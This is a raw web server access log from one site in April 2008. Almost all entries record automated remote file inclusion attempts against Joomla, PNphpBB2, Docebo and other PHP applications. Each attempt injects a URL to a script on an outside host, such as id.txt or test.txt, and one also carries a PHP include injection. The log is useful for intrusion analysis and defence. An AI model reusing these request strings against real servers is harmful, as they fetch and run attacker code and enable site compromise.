87.2.168.152 - - [08/Apr/2008:12:01:41 -0700] "GET /logs/access_080313.loghttp://myluckypotparty.chat.ru/images? HTTP/1.0" 404 275 "-" "Googlebot/2.1 (http://www.googlebot.com/bot.html)" "www.dmulk.com"
62.193.224.190 - - [08/Apr/2008:12:01:43 -0700] "GET /logs/access_080324.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.70.35.179 - - [08/Apr/2008:12:02:09 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:12:02:09 -0700] "GET /index.php?url=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:02:17 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.154.47 - - [08/Apr/2008:12:02:28 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://kerjain.net/c? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.154.47 - - [08/Apr/2008:12:02:33 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://kerjain.net/c? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.154.47 - - [08/Apr/2008:12:02:40 -0700] "GET /logs/access_080329.log/index.php?option=com_custompages&cpage=http://kerjain.net/c? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.154.47 - - [08/Apr/2008:12:02:58 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://www.kingwild.com/c? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.154.47 - - [08/Apr/2008:12:03:05 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.kingwild.com/c? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:12:03:11 -0700] "GET /logs/access_080313.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:12:03:11 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:12:03:12 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.154.47 - - [08/Apr/2008:12:03:16 -0700] "GET /logs/access_080329.log/index.php?option=com_custompages&cpage=http://www.kingwild.com/c? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:12:03:39 -0700] "GET /logs/access_080212.log/avatar.php?page=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.216.175.53 - - [08/Apr/2008:12:04:47 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.216.175.53 - - [08/Apr/2008:12:04:47 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.41 - - [08/Apr/2008:12:05:31 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.251.182 - - [08/Apr/2008:12:05:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
203.146.251.182 - - [08/Apr/2008:12:05:48 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:12:05:55 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:12:05:55 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:12:05:59 -0700] "GET /logs/access_080313.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:12:06:04 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:12:06:04 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.214.214 - - [08/Apr/2008:12:06:38 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scadi.cl/.setan/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.71.36.82 - - [08/Apr/2008:12:06:51 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.36.82 - - [08/Apr/2008:12:06:52 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.77.225 - - [08/Apr/2008:12:07:21 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.77.225 - - [08/Apr/2008:12:07:21 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.50.214.191 - - [08/Apr/2008:12:07:31 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.blackid.org/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
69.50.214.191 - - [08/Apr/2008:12:07:33 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.blackid.org/bo.do?? HTTP/1.1" 200 4139 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
80.71.36.82 - - [08/Apr/2008:12:08:08 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.77.225 - - [08/Apr/2008:12:08:45 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.77.225 - - [08/Apr/2008:12:08:45 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:09:16 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:09:16 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:09:16 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.216.175.53 - - [08/Apr/2008:12:09:28 -0700] "GET /logs/access_080313.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.216.175.53 - - [08/Apr/2008:12:09:29 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.77.225 - - [08/Apr/2008:12:10:06 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:10:52 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.195.77.225 - - [08/Apr/2008:12:10:55 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:10:57 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:11:31 -0700] "GET /logs/access_080126.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:11:32 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:11:38 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:12:12:04 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:12:12:04 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:12:04 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:12:12:35 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:12:12:35 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:12:49 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:12:49 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:12:49 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:12:12:51 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.130.178 - - [08/Apr/2008:12:13:45 -0700] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.130.178 - - [08/Apr/2008:12:13:46 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:12:14:03 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:12:14:10 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:12:14:12 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:12:14:48 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.193 - - [08/Apr/2008:12:14:53 -0700] "GET /logs/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://treffpunkteinrich.de/newswriter14/include/tinymce_1_45/examples/zh_cn/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
80.67.27.193 - - [08/Apr/2008:12:14:56 -0700] "GET /index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://treffpunkteinrich.de/newswriter14/include/tinymce_1_45/examples/zh_cn/test.txt? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
129.241.104.187 - "" [08/Apr/2008:12:15:21 -0700] "GET /?D=A HTTP/1.1" 200 7371 "-" "boitho.com-dc/0.86 ( http://www.boitho.com/dcbot.html )" "www.dmulk.com"
74.52.130.178 - - [08/Apr/2008:12:15:41 -0700] "GET /logs/access_080308.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:12:16:10 -0700] "GET /logs/access_080215.log/main.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:12:16:10 -0700] "GET /main.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:12:16:10 -0700] "GET /logs/main.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.230.71.1 - - [08/Apr/2008:12:16:54 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:12:17:02 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.52.146 - - [08/Apr/2008:12:17:12 -0700] "GET /logs/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://treffpunkteinrich.de/newswriter14/include/tinymce_1_45/examples/zh_cn/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
209.85.52.146 - - [08/Apr/2008:12:17:13 -0700] "GET /index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://treffpunkteinrich.de/newswriter14/include/tinymce_1_45/examples/zh_cn/test.txt? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:12:17:39 -0700] "GET /logs/access_080215.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.253.11 - - [08/Apr/2008:12:17:47 -0700] "GET /logs/access_080215.log/main.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.253.11 - - [08/Apr/2008:12:17:47 -0700] "GET /main.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.253.11 - - [08/Apr/2008:12:17:47 -0700] "GET /logs/main.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.10.251 - - [08/Apr/2008:12:18:27 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [08/Apr/2008:12:18:29 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [08/Apr/2008:12:18:30 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [08/Apr/2008:12:18:51 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [08/Apr/2008:12:18:53 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [08/Apr/2008:12:18:54 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [08/Apr/2008:12:18:55 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [08/Apr/2008:12:18:57 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [08/Apr/2008:12:18:59 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [08/Apr/2008:12:19:00 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [08/Apr/2008:12:19:11 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [08/Apr/2008:12:19:14 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.230.71.1 - - [08/Apr/2008:12:19:32 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:12:19:32 -0700] "GET /logs/access_080216.log//matic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:20:37 -0700] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:12:20:38 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:12:20:43 -0700] "GET /logs/access_080118.log//inc/cmses/aedating4CMS.php?dir[inc]=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:12:20:43 -0700] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:12:20:44 -0700] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:12:20:50 -0700] "GET /logs/access_080124.log//inc/cmses/aedating4CMS.php?dir[inc]=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:20:58 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.195.77.225 - - [08/Apr/2008:12:21:00 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:21:04 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.71.36.82 - - [08/Apr/2008:12:21:39 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.36.82 - - [08/Apr/2008:12:21:39 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:12:22:06 -0700] "GET /logs/access_080118.log//inc/cmses/aedating4CMS.php?dir[inc]=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:12:22:06 -0700] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:12:22:07 -0700] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
